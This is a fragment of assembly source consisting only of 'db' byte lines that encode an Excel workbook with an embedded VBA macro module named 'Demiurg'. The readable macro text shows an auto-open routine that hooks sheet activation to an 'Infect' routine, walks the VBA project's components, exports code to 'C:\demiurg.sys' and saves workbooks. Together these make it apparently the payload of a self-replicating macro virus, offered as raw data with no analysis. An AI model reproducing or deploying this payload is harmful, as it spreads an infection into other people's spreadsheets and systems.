db 03Dh, 000h, 000h, 000h, 0CEh, 05Ah, 054h, 030h
db 0E6h, 004h, 000h, 065h, 010h, 000h, 030h, 070h
db 06Ah, 054h, 030h, 0ECh, 004h, 09Ah, 000h, 04Ch
db 000h, 000h, 000h, 0D9h, 010h, 000h, 030h, 0ECh
db 004h, 09Ah, 000h, 070h, 06Ah, 054h, 030h, 04Ch
db 000h, 000h, 000h, 0CEh, 05Ah, 054h, 030h, 0BAh
db 0C7h, 062h, 000h, 0C0h, 0C7h, 062h, 0E6h, 00Dh
db 000h, 0A2h, 0C7h, 010h, 030h, 009h, 004h, 0E6h
db 00Ah, 000h, 024h, 000h, 000h, 000h, 0FCh, 0E7h
db 062h, 000h, 0F3h, 083h, 00Fh, 030h, 04Ch, 0C7h
db 062h, 000h, 001h, 000h, 000h, 000h, 010h, 0A3h
db 09Ah, 0E6h, 009h, 000h, 0C0h, 0C7h, 062h, 0E6h
db 005h, 000h, 010h, 0A3h, 09Ah, 0E6h, 005h, 000h
db 0F4h, 0C6h, 062h, 000h, 06Eh, 083h, 00Fh, 030h
db 0E6h, 024h, 000h, 038h, 005h, 09Ch, 000h, 0DCh
db 0C7h, 062h, 000h, 014h, 000h, 000h, 000h, 0E0h
db 000h, 000h, 000h, 0A8h, 0C7h, 062h, 000h, 0FCh
db 0E7h, 062h, 0E6h, 005h, 000h, 01Ch, 0A2h, 09Ah
db 000h, 0C4h, 0C7h, 062h, 000h, 09Ah, 020h, 000h
db 030h, 01Ch, 0A2h, 09Ah, 000h, 073h, 090h, 00Ah
db 000h, 000h, 000h, 009h, 008h, 010h, 000h, 000h
db 006h, 010h, 000h, 0D3h, 010h, 0CCh, 007h, 041h
db 000h, 000h, 000h, 006h, 000h, 000h, 000h, 00Bh
db 002h, 010h, 0E6h, 00Dh, 000h, 03Eh, 00Ah, 000h
db 000h, 00Dh, 000h, 002h, 000h, 001h, 000h, 00Ch
db 000h, 002h, 000h, 064h, 000h, 00Fh, 000h, 002h
db 000h, 001h, 000h, 011h, 000h, 002h, 000h, 000h
db 000h, 010h, 000h, 008h, 000h, 0FCh, 0A9h, 0F1h
db 0D2h, 04Dh, 062h, 050h, 03Fh, 05Fh, 000h, 002h
db 000h, 001h, 000h, 02Ah, 000h, 002h, 000h, 000h
db 000h, 02Bh, 000h, 002h, 000h, 000h, 000h, 082h
db 000h, 002h, 000h, 001h, 000h, 080h, 000h, 008h
db 0E6h, 009h, 000h, 025h, 002h, 004h, 000h, 000h
db 000h, 0FFh, 000h, 081h, 000h, 002h, 000h, 0C1h
db 004h, 014h, 000h, 000h, 000h, 015h, 000h, 000h
db 000h, 083h, 000h, 002h, 000h, 000h, 000h, 084h
db 000h, 002h, 000h, 000h, 000h, 0A1h, 000h, 022h
db 000h, 000h, 000h, 0FFh, 000h, 001h, 000h, 001h
db 000h, 001h, 000h, 004h, 000h, 0DEh, 0C7h, 062h
db 000h, 08Ah, 01Dh, 03Ch, 0FCh, 0FDh, 07Eh, 0DFh
db 03Fh, 08Ah, 01Dh, 03Ch, 0FCh, 0FDh, 07Eh, 0DFh
db 03Fh, 0CEh, 05Ah, 055h, 000h, 002h, 000h, 00Ah
db 000h, 000h, 002h, 00Eh, 0E6h, 00Fh, 000h, 03Eh
db 002h, 012h, 000h, 0B6h, 006h, 0E6h, 004h, 000h
db 040h, 0E6h, 00Bh, 000h, 01Dh, 000h, 00Fh, 000h
db 003h, 0E6h, 006h, 000h, 001h, 0E6h, 007h, 000h
db 0BAh, 001h, 00Bh, 000h, 008h, 000h, 000h, 054h
db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 00Ah
db 0E6h, 031h, 000h, 001h, 016h, 001h, 000h, 000h
db 0B6h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h, 004h
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 0E6h
db 006h, 0FFh, 0E6h, 034h, 000h, 010h, 000h, 000h
db 000h, 003h, 000h, 000h, 000h, 005h, 000h, 000h
db 000h, 007h, 000h, 000h, 000h, 0E6h, 008h, 0FFh
db 001h, 001h, 008h, 000h, 000h, 000h, 0E6h, 004h
db 0FFh, 078h, 000h, 000h, 000h, 0DEh, 000h, 000h
db 000h, 0AFh, 002h, 000h, 000h, 0F5h, 001h, 000h
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 001h
db 000h, 000h, 000h, 0B5h, 031h, 0B7h, 031h, 000h
db 000h, 0FFh, 0FFh, 023h, 000h, 000h, 000h, 088h
db 000h, 000h, 000h, 008h, 0E6h, 020h, 000h, 0FFh
db 0FFh, 000h, 000h, 0CBh, 002h, 000h, 000h, 0D6h
db 000h, 000h, 000h, 0D6h, 000h, 000h, 000h, 01Fh
db 003h, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 0E6h
db 004h, 000h, 0DFh, 000h, 0FFh, 0FFh, 0E6h, 004h
db 000h, 00Ch, 000h, 0E6h, 058h, 0FFh, 044h, 000h
db 069h, 000h, 065h, 000h, 073h, 000h, 065h, 000h
db 041h, 000h, 072h, 000h, 062h, 000h, 065h, 000h
db 069h, 000h, 074h, 000h, 073h, 000h, 06Dh, 000h
db 061h, 000h, 070h, 000h, 070h, 000h, 065h, 0E6h
db 01Fh, 000h, 024h, 000h, 002h, 001h, 007h, 000h
db 000h, 000h, 0E6h, 008h, 0FFh, 0E6h, 024h, 000h
db 02Bh, 000h, 000h, 000h, 0CAh, 003h, 0E6h, 006h
db 000h, 054h, 000h, 061h, 000h, 062h, 000h, 065h
db 000h, 06Ch, 000h, 06Ch, 000h, 065h, 000h, 031h
db 0E6h, 031h, 000h, 012h, 000h, 002h, 001h, 006h
db 000h, 000h, 000h, 004h, 000h, 000h, 000h, 0E6h
db 004h, 0FFh, 0E6h, 024h, 000h, 03Bh, 000h, 000h
db 000h, 0BFh, 003h, 0E6h, 006h, 000h, 044h, 000h
db 065h, 000h, 06Dh, 000h, 069h, 000h, 075h, 000h
db 072h, 000h, 067h, 0E6h, 033h, 000h, 010h, 000h
db 002h, 001h, 008h, 000h, 000h, 000h, 0E6h, 008h
db 0FFh, 0E6h, 024h, 000h, 04Ah, 000h, 000h, 000h
db 01Fh, 007h, 0E6h, 006h, 000h, 05Fh, 000h, 056h
db 000h, 042h, 000h, 041h, 000h, 05Fh, 000h, 050h
db 000h, 052h, 000h, 04Fh, 000h, 04Ah, 000h, 045h
db 000h, 043h, 000h, 054h, 0E6h, 029h, 000h, 01Ah
db 000h, 002h, 000h, 0E6h, 00Ch, 0FFh, 0E6h, 024h
db 000h, 067h, 000h, 000h, 000h, 059h, 00Ch, 0E6h
db 006h, 000h, 0E6h, 028h, 0FFh, 028h, 000h, 000h
db 000h, 002h, 000h, 053h, 04Ch, 0E6h, 004h, 0FFh
db 000h, 000h, 001h, 000h, 053h, 010h, 0E6h, 004h
db 0FFh, 000h, 000h, 001h, 000h, 053h, 094h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 002h, 03Ch, 0E6h
db 004h, 0FFh, 000h, 000h, 0FFh, 0FFh, 001h, 001h
db 0E6h, 004h, 000h, 001h, 000h, 04Eh, 000h, 030h
db 000h, 07Bh, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 032h, 000h, 030h, 000h, 038h, 000h, 031h
db 000h, 039h, 000h, 02Dh, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 02Dh, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 02Dh
db 000h, 043h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 034h
db 000h, 036h, 000h, 07Dh, 0E6h, 007h, 000h, 0DFh
db 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 001h, 001h
db 038h, 000h, 000h, 000h, 002h, 081h, 0FEh, 0E6h
db 009h, 0FFh, 028h, 0E6h, 005h, 000h, 0FFh, 0FFh
db 0E6h, 008h, 000h, 0E6h, 008h, 0FFh, 074h, 000h
db 020h, 000h, 01Dh, 000h, 000h, 000h, 024h, 000h
db 000h, 000h, 0E6h, 004h, 0FFh, 048h, 0E6h, 005h
db 000h, 0FFh, 0FFh, 000h, 000h, 001h, 0E6h, 007h
db 000h, 0E6h, 00Ch, 0FFh, 0E6h, 004h, 000h, 0E6h
db 010h, 0FFh, 0E6h, 004h, 000h, 0E6h, 010h, 0FFh
db 0E6h, 008h, 000h, 0E6h, 008h, 0FFh, 0E6h, 004h
db 000h, 0E6h, 01Eh, 0FFh, 04Dh, 045h, 000h, 000h
db 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
db 0E6h, 004h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
db 040h, 000h, 0FEh, 0CAh, 001h, 000h, 000h, 000h
db 0E6h, 004h, 0FFh, 001h, 001h, 008h, 000h, 000h
db 000h, 0E6h, 004h, 0FFh, 078h, 000h, 000h, 000h
db 001h, 0A7h, 0B0h, 000h, 041h, 074h, 074h, 072h
db 069h, 062h, 075h, 074h, 000h, 065h, 020h, 056h
db 042h, 05Fh, 04Eh, 061h, 06Dh, 000h, 065h, 020h
db 03Dh, 020h, 022h, 044h, 069h, 065h, 000h, 073h
db 065h, 041h, 072h, 062h, 065h, 069h, 074h, 000h
db 073h, 06Dh, 061h, 070h, 070h, 065h, 022h, 00Dh
db 022h, 00Ah, 00Ah, 0A0h, 042h, 061h, 073h, 002h
db 0A0h, 030h, 07Bh, 000h, 030h, 030h, 030h, 032h
db 030h, 038h, 031h, 039h, 0EAh, 02Dh, 000h, 010h
db 030h, 003h, 008h, 043h, 000h, 014h, 002h, 012h
db 001h, 024h, 020h, 030h, 030h, 034h, 036h, 07Dh
db 00Dh, 07Ch, 043h, 072h, 040h, 065h, 061h, 074h
db 061h, 062h, 06Ch, 001h, 086h, 046h, 010h, 061h
db 06Ch, 073h, 065h, 00Ch, 05Eh, 050h, 072h, 065h
db 020h, 064h, 065h, 063h, 06Ch, 061h, 000h, 006h
db 049h, 064h, 011h, 000h, 090h, 054h, 072h, 075h
db 00Dh, 022h, 045h, 078h, 070h, 008h, 06Fh, 073h
db 065h, 014h, 01Ch, 054h, 065h, 06Dh, 070h, 000h
db 06Ch, 061h, 074h, 065h, 044h, 065h, 072h, 069h
db 006h, 076h, 002h, 024h, 011h, 065h, 043h, 075h
db 073h, 074h, 06Fh, 018h, 06Dh, 069h, 07Ah, 004h
db 044h, 003h, 032h, 0E6h, 036h, 000h, 001h, 016h
db 001h, 000h, 000h, 0B6h, 000h, 0FFh, 0FFh, 001h
db 001h, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 0E6h
db 004h, 000h, 0E6h, 006h, 0FFh, 0E6h, 034h, 000h
db 010h, 000h, 000h, 000h, 003h, 000h, 000h, 000h
db 005h, 000h, 000h, 000h, 007h, 000h, 000h, 000h
db 0E6h, 008h, 0FFh, 001h, 001h, 008h, 000h, 000h
db 000h, 0E6h, 004h, 0FFh, 078h, 000h, 000h, 000h
db 0DEh, 000h, 000h, 000h, 0AFh, 002h, 000h, 000h
db 0F5h, 001h, 000h, 000h, 0E6h, 004h, 0FFh, 0E6h
db 004h, 000h, 001h, 000h, 000h, 000h, 0B5h, 031h
db 0B9h, 031h, 000h, 000h, 0FFh, 0FFh, 023h, 000h
db 000h, 000h, 088h, 000h, 000h, 000h, 008h, 0E6h
db 020h, 000h, 0FFh, 0FFh, 000h, 000h, 0CBh, 002h
db 000h, 000h, 0D6h, 000h, 000h, 000h, 0D6h, 000h
db 000h, 000h, 01Fh, 003h, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 0DFh, 000h, 0FFh
db 0FFh, 0E6h, 004h, 000h, 00Ch, 000h, 0E6h, 080h
db 0FFh, 028h, 000h, 000h, 000h, 002h, 000h, 053h
db 04Ch, 0E6h, 004h, 0FFh, 000h, 000h, 001h, 000h
db 053h, 010h, 0E6h, 004h, 0FFh, 000h, 000h, 001h
db 000h, 053h, 094h, 0E6h, 004h, 0FFh, 0E6h, 004h
db 000h, 002h, 03Ch, 0E6h, 004h, 0FFh, 000h, 000h
db 0FFh, 0FFh, 001h, 001h, 0E6h, 004h, 000h, 001h
db 000h, 04Eh, 000h, 030h, 000h, 07Bh, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 032h, 000h, 030h
db 000h, 038h, 000h, 032h, 000h, 030h, 000h, 02Dh
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 02Dh, 000h, 043h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 02Dh, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 034h, 000h, 036h, 000h, 07Dh
db 0E6h, 007h, 000h, 0DFh, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 001h, 001h, 038h, 000h, 000h, 000h
db 002h, 081h, 0FEh, 0E6h, 009h, 0FFh, 028h, 0E6h
db 005h, 000h, 0FFh, 0FFh, 0E6h, 008h, 000h, 0E6h
db 008h, 0FFh, 0E6h, 004h, 000h, 01Dh, 000h, 000h
db 000h, 024h, 000h, 000h, 000h, 0E6h, 004h, 0FFh
db 048h, 0E6h, 005h, 000h, 0FFh, 0FFh, 000h, 000h
db 001h, 0E6h, 007h, 000h, 0E6h, 00Ch, 0FFh, 0E6h
db 004h, 000h, 0E6h, 010h, 0FFh, 0E6h, 004h, 000h
db 0E6h, 010h, 0FFh, 0E6h, 008h, 000h, 0E6h, 008h
db 0FFh, 0E6h, 004h, 000h, 0E6h, 01Eh, 0FFh, 04Dh
db 045h, 000h, 000h, 0E6h, 006h, 0FFh, 0E6h, 004h
db 000h, 0FFh, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
db 001h, 001h, 0E6h, 040h, 000h, 0FEh, 0CAh, 001h
db 000h, 000h, 000h, 0E6h, 004h, 0FFh, 001h, 001h
db 008h, 000h, 000h, 000h, 0E6h, 004h, 0FFh, 078h
db 000h, 000h, 000h, 001h, 09Ch, 0B0h, 000h, 041h
db 074h, 074h, 072h, 069h, 062h, 075h, 074h, 000h
db 065h, 020h, 056h, 042h, 05Fh, 04Eh, 061h, 06Dh
db 000h, 065h, 020h, 03Dh, 020h, 022h, 054h, 061h
db 062h, 000h, 065h, 06Ch, 06Ch, 065h, 031h, 022h
db 00Dh, 00Ah, 011h, 00Ah, 0F8h, 042h, 061h, 073h
db 002h, 07Ch, 030h, 07Bh, 030h, 000h, 030h, 030h
db 032h, 030h, 038h, 032h, 030h, 02Dh, 03Bh, 000h
db 020h, 004h, 008h, 043h, 000h, 014h, 002h, 01Ch
db 001h, 024h, 030h, 030h, 008h, 034h, 036h, 07Dh
db 00Dh, 07Ch, 043h, 072h, 065h, 061h, 010h, 074h
db 061h, 062h, 06Ch, 001h, 086h, 046h, 061h, 06Ch
db 004h, 073h, 065h, 00Ch, 0BCh, 050h, 072h, 065h
db 064h, 065h, 048h, 063h, 06Ch, 061h, 000h, 006h
db 049h, 064h, 000h, 087h, 054h, 004h, 072h, 075h
db 00Dh, 022h, 045h, 078h, 070h, 06Fh, 073h, 002h
db 065h, 014h, 01Ch, 054h, 065h, 06Dh, 070h, 06Ch
db 061h, 080h, 074h, 065h, 044h, 065h, 072h, 069h
db 076h, 002h, 024h, 001h, 011h, 065h, 043h, 075h
db 073h, 074h, 06Fh, 06Dh, 069h, 006h, 07Ah, 004h
db 088h, 003h, 032h, 000h, 001h, 016h, 001h, 000h
db 001h, 0B6h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
db 004h, 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h
db 0E6h, 006h, 0FFh, 0E6h, 034h, 000h, 010h, 000h
db 000h, 000h, 003h, 000h, 000h, 000h, 005h, 000h
db 000h, 000h, 007h, 000h, 000h, 000h, 0E6h, 008h
db 0FFh, 001h, 001h, 008h, 000h, 000h, 000h, 0E6h
db 004h, 0FFh, 078h, 000h, 000h, 000h, 0DEh, 000h
db 000h, 000h, 037h, 003h, 000h, 000h, 0A5h, 001h
db 000h, 000h, 0E6h, 004h, 0FFh, 002h, 000h, 000h
db 000h, 001h, 000h, 000h, 000h, 0B5h, 031h, 0BBh
db 031h, 000h, 000h, 0FFh, 0FFh, 003h, 0E6h, 007h
db 000h, 002h, 0E6h, 020h, 000h, 0FFh, 0FFh, 000h
db 000h, 053h, 003h, 000h, 000h, 0D6h, 000h, 000h
db 000h, 0D6h, 000h, 000h, 000h, 0B7h, 005h, 0E6h
db 004h, 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h
db 0DFh, 000h, 0FFh, 0FFh, 0E6h, 006h, 000h, 0E6h
db 080h, 0FFh, 028h, 0E6h, 005h, 000h, 002h, 03Ch
db 00Ch, 000h, 0FFh, 0FFh, 0E6h, 004h, 000h, 002h
db 03Ch, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 002h
db 03Ch, 004h, 000h, 0FFh, 0FFh, 0E6h, 004h, 000h
db 002h, 03Ch, 008h, 000h, 0FFh, 0FFh, 000h, 000h
db 0FFh, 0FFh, 001h, 001h, 0E6h, 006h, 000h, 0E8h
db 005h, 0C0h, 038h, 003h, 000h, 0DFh, 0E6h, 004h
db 000h, 050h, 000h, 000h, 000h, 001h, 001h, 010h
db 001h, 000h, 000h, 00Bh, 012h, 01Eh, 002h, 080h
db 0E6h, 006h, 000h, 060h, 0E6h, 004h, 000h, 0E6h
db 008h, 0FFh, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh
db 0E6h, 004h, 000h, 0E6h, 00Ah, 0FFh, 000h, 000h
db 003h, 000h, 003h, 000h, 000h, 000h, 084h, 000h
db 000h, 001h, 0E6h, 006h, 000h, 080h, 000h, 000h
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 0C0h, 000h, 000h, 000h, 028h, 0E6h
db 007h, 000h, 0E6h, 004h, 0FFh, 068h, 0FFh, 040h
db 000h, 0E6h, 00Ah, 0FFh, 001h, 000h, 003h, 000h
db 003h, 000h, 003h, 000h, 084h, 000h, 000h, 001h
db 0E6h, 006h, 000h, 00Bh, 012h, 02Ah, 002h, 0E6h
db 004h, 0FFh, 002h, 000h, 000h, 060h, 0E6h, 004h
db 000h, 0E6h, 008h, 0FFh, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 0E6h, 00Ah, 0FFh
db 002h, 000h, 00Dh, 000h, 00Dh, 000h, 006h, 000h
db 084h, 000h, 000h, 001h, 000h, 000h, 004h, 000h
db 0E6h, 006h, 0FFh, 010h, 000h, 000h, 000h, 040h
db 0E6h, 007h, 000h, 080h, 000h, 000h, 000h, 0E6h
db 004h, 0FFh, 002h, 083h, 01Ch, 002h, 0E6h, 004h
db 0FFh, 008h, 000h, 0FFh, 0FFh, 000h, 001h, 0E6h
db 004h, 000h, 0E6h, 006h, 0FFh, 0E6h, 004h, 000h
db 0E6h, 008h, 0FFh, 0E6h, 004h, 000h, 01Dh, 000h
db 000h, 000h, 024h, 000h, 000h, 000h, 0E6h, 004h
db 0FFh, 0F0h, 000h, 000h, 000h, 002h, 000h, 002h
db 0E6h, 00Fh, 000h, 0E6h, 010h, 0FFh, 080h, 000h
db 000h, 000h, 0E6h, 018h, 0FFh, 0D8h, 0E6h, 00Bh
db 000h, 008h, 000h, 004h, 000h, 0E6h, 004h, 0FFh
db 0E6h, 004h, 000h, 0E6h, 018h, 0FFh, 004h, 000h
db 040h, 000h, 000h, 000h, 04Dh, 045h, 000h, 000h
db 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
db 0E6h, 004h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
db 040h, 000h, 0FEh, 0CAh, 001h, 000h, 010h, 000h
db 022h, 081h, 008h, 000h, 006h, 000h, 00Ch, 0E6h
db 006h, 000h, 081h, 008h, 004h, 012h, 000h, 000h
db 000h, 008h, 000h, 000h, 000h, 004h, 081h, 008h
db 000h, 002h, 000h, 000h, 000h, 020h, 000h, 000h
db 000h, 022h, 081h, 008h, 000h, 006h, 000h, 00Ch
db 000h, 040h, 0E6h, 004h, 000h, 081h, 008h, 004h
db 00Ah, 000h, 000h, 000h, 048h, 0E6h, 004h, 000h
db 080h, 009h, 0E6h, 005h, 000h, 0E6h, 004h, 0FFh
db 000h, 081h, 008h, 004h, 026h, 000h, 000h, 000h
db 058h, 0E6h, 004h, 000h, 081h, 008h, 004h, 02Eh
db 000h, 000h, 000h, 080h, 0E6h, 004h, 000h, 080h
db 009h, 0E6h, 005h, 000h, 0E6h, 004h, 0FFh, 000h
db 081h, 008h, 008h, 01Eh, 000h, 000h, 000h, 0B0h
db 0E6h, 004h, 000h, 081h, 008h, 00Ch, 02Ch, 000h
db 000h, 000h, 0D0h, 0E6h, 004h, 000h, 081h, 008h
db 008h, 00Ah, 0E6h, 004h, 000h, 001h, 000h, 000h
db 000h, 080h, 009h, 0E6h, 005h, 000h, 0E6h, 004h
db 0FFh, 000h, 081h, 008h, 004h, 026h, 000h, 000h
db 000h, 010h, 001h, 000h, 000h, 000h, 081h, 008h
db 004h, 00Ah, 000h, 000h, 000h, 038h, 001h, 000h
db 000h, 004h, 081h, 008h, 000h, 002h, 000h, 000h
db 000h, 048h, 001h, 000h, 000h, 0E6h, 004h, 0FFh
db 001h, 001h, 058h, 001h, 000h, 000h, 08Fh, 004h
db 0E6h, 006h, 000h, 0AEh, 000h, 006h, 000h, 049h
db 06Eh, 066h, 065h, 063h, 074h, 020h, 000h, 020h
db 002h, 028h, 000h, 022h, 002h, 0E6h, 006h, 0FFh
db 06Ch, 000h, 0FFh, 0FFh, 058h, 000h, 000h, 000h
db 0AFh, 000h, 020h, 000h, 026h, 002h, 028h, 000h
db 028h, 002h, 0FFh, 0FFh, 015h, 002h, 000h, 000h
db 06Ch, 000h, 0FFh, 0FFh, 038h, 000h, 000h, 000h
db 08Fh, 004h, 080h, 0E6h, 005h, 000h, 0AFh, 000h
db 020h, 000h, 020h, 002h, 028h, 000h, 02Ch, 002h
db 0E6h, 006h, 0FFh, 020h, 000h, 032h, 002h, 021h
db 000h, 008h, 001h, 020h, 000h, 032h, 002h, 021h
db 000h, 008h, 001h, 01Bh, 000h, 0A4h, 000h, 001h
db 000h, 024h, 020h, 0FCh, 000h, 003h, 000h, 024h
db 000h, 030h, 002h, 001h, 000h, 027h, 000h, 02Eh
db 002h, 000h, 000h, 0AEh, 000h, 001h, 000h, 031h
db 000h, 024h, 000h, 030h, 002h, 001h, 000h, 020h
db 000h, 02Eh, 002h, 007h, 000h, 020h, 000h, 02Eh
db 002h, 0AEh, 000h, 001h, 000h, 039h, 000h, 024h
db 000h, 030h, 002h, 001h, 000h, 007h, 000h, 004h
db 000h, 094h, 000h, 046h, 000h, 075h, 000h, 067h
db 000h, 000h, 0F0h, 0F7h, 000h, 020h, 000h, 034h
db 002h, 0F6h, 000h, 0A4h, 000h, 001h, 000h, 020h
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 021h
db 000h, 038h, 002h, 021h, 000h, 03Ah, 002h, 08Bh
db 000h, 000h, 000h, 020h, 000h, 034h, 002h, 020h
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 025h
db 000h, 038h, 002h, 001h, 000h, 021h, 000h, 008h
db 001h, 0AEh, 000h, 007h, 000h, 044h, 065h, 06Dh
db 069h, 075h, 072h, 067h, 000h, 005h, 000h, 094h
db 000h, 046h, 000h, 075h, 000h, 067h, 000h, 0F8h
db 000h, 000h, 000h, 0F7h, 000h, 020h, 000h, 034h
db 002h, 0F6h, 000h, 0C0h, 000h, 000h, 0A0h, 048h
db 037h, 044h, 000h, 0AEh, 000h, 00Eh, 000h, 043h
db 03Ah, 05Ch, 064h, 065h, 06Dh, 069h, 075h, 072h
db 067h, 02Eh, 073h, 079h, 073h, 01Dh, 000h, 020h
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 021h
db 000h, 038h, 002h, 042h, 040h, 03Ch, 002h, 001h
db 000h, 000h, 000h, 020h, 000h, 032h, 002h, 042h
db 040h, 03Eh, 002h, 0E6h, 004h, 000h, 021h, 000h
db 000h, 0A0h, 06Ch, 000h, 0FFh, 0FFh, 0A8h, 000h
db 000h, 000h, 0E6h, 004h, 0FFh, 0A8h, 000h, 000h
db 000h, 001h, 064h, 0B1h, 000h, 041h, 074h, 074h
db 072h, 069h, 062h, 075h, 074h, 000h, 065h, 020h
db 056h, 042h, 05Fh, 04Eh, 061h, 06Dh, 000h, 065h
db 020h, 03Dh, 020h, 022h, 044h, 065h, 06Dh, 000h
db 069h, 075h, 072h, 067h, 022h, 00Dh, 00Ah, 053h
db 000h, 075h, 062h, 020h, 041h, 075h, 074h, 06Fh
db 05Fh, 000h, 04Fh, 070h, 065h, 06Eh, 028h, 029h
db 00Dh, 00Ah, 002h, 020h, 000h, 000h, 041h, 070h
db 070h, 06Ch, 069h, 063h, 000h, 061h, 074h, 069h
db 06Fh, 06Eh, 02Eh, 04Fh, 06Eh, 000h, 053h, 068h
db 065h, 065h, 074h, 041h, 063h, 074h, 018h, 069h
db 076h, 061h, 000h, 08Ah, 000h, 07Ah, 049h, 06Eh
db 066h, 008h, 065h, 063h, 074h, 000h, 078h, 045h
db 06Eh, 064h, 020h, 00Fh, 000h, 080h, 003h, 08Ah
db 003h, 02Ah, 011h, 084h, 044h, 069h, 073h, 070h
db 000h, 06Ch, 061h, 079h, 041h, 06Ch, 065h, 072h
db 074h, 002h, 073h, 000h, 07Eh, 046h, 061h, 06Ch
db 073h, 065h, 00Dh, 002h, 00Ah, 003h, 06Bh, 06Ch
db 061h, 073h, 074h, 063h, 068h, 004h, 061h, 072h
db 000h, 017h, 041h, 073h, 063h, 028h, 04Dh, 010h
db 069h, 064h, 024h, 028h, 002h, 06Ch, 065h, 057h
db 06Fh, 080h, 072h, 06Bh, 062h, 06Fh, 06Fh, 06Bh
db 02Eh, 001h, 0B5h, 018h, 02Ch, 020h, 04Ch, 000h
db 09Fh, 010h, 018h, 029h, 02Ch, 020h, 044h, 031h
db 029h, 004h, 0B7h, 049h, 066h, 020h, 001h, 043h
db 022h, 080h, 031h, 022h, 029h, 020h, 03Ch, 03Dh
db 020h, 006h, 05Ah, 05Eh, 041h, 080h, 053h, 006h
db 006h, 000h, 00Ch, 002h, 012h, 039h, 000h, 012h
db 054h, 000h, 068h, 065h, 06Eh, 020h, 045h, 078h
db 069h, 074h, 007h, 003h, 063h, 083h, 048h, 081h
db 080h, 046h, 06Fh, 072h, 020h, 069h, 041h, 000h
db 049h, 031h, 020h, 054h, 06Fh, 020h, 08Ch, 03Ah
db 056h, 020h, 042h, 050h, 072h, 06Fh, 06Ah, 080h
db 080h, 02Eh, 056h, 000h, 042h, 043h, 06Fh, 06Dh
db 070h, 06Fh, 06Eh, 065h, 000h, 06Eh, 074h, 073h
db 02Eh, 063h, 06Fh, 075h, 06Eh, 07Eh, 074h, 087h
db 020h, 081h, 022h, 081h, 047h, 081h, 09Bh, 007h
db 065h, 093h, 01Dh, 028h, 0DCh, 069h, 029h, 002h
db 072h, 000h, 038h, 006h, 0CDh, 020h, 08Ch, 04Dh
db 081h, 027h, 081h, 081h, 001h, 04Eh, 065h, 078h
db 074h, 020h, 069h, 085h, 09Eh, 005h, 023h, 04Dh
db 049h, 000h, 029h, 072h, 074h, 020h, 028h, 022h
db 010h, 043h, 03Ah, 05Ch, 064h, 083h, 07Eh, 02Eh
db 073h, 079h, 08Ch, 073h, 022h, 085h, 07Bh, 0CBh
db 028h, 053h, 061h, 076h, 040h, 067h, 001h, 0C6h
db 076h, 0E6h, 021h, 000h, 0CCh, 061h, 05Eh, 000h
db 000h, 001h, 000h, 0FFh, 007h, 00Ch, 000h, 000h
db 009h, 004h, 000h, 000h, 0E4h, 004h, 001h, 0E6h
db 009h, 000h, 001h, 000h, 005h, 000h, 002h, 000h
db 01Ah, 001h, 02Ah, 000h, 05Ch, 000h, 047h, 000h
db 07Bh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 032h, 000h, 030h, 000h, 034h, 000h, 045h, 000h
db 046h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 02Dh, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
db 043h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 034h, 000h
db 036h, 000h, 07Dh, 000h, 023h, 000h, 033h, 000h
db 02Eh, 000h, 030h, 000h, 023h, 000h, 039h, 000h
db 023h, 000h, 043h, 000h, 03Ah, 000h, 05Ch, 000h
db 050h, 000h, 052h, 000h, 04Fh, 000h, 047h, 000h
db 052h, 000h, 041h, 000h, 04Dh, 000h, 04Dh, 000h
db 045h, 000h, 05Ch, 000h, 047h, 000h, 045h, 000h
db 04Dh, 000h, 045h, 000h, 049h, 000h, 04Eh, 000h
db 053h, 000h, 041h, 000h, 04Dh, 000h, 045h, 000h
db 020h, 000h, 044h, 000h, 041h, 000h, 054h, 000h
db 045h, 000h, 049h, 000h, 045h, 000h, 04Eh, 000h
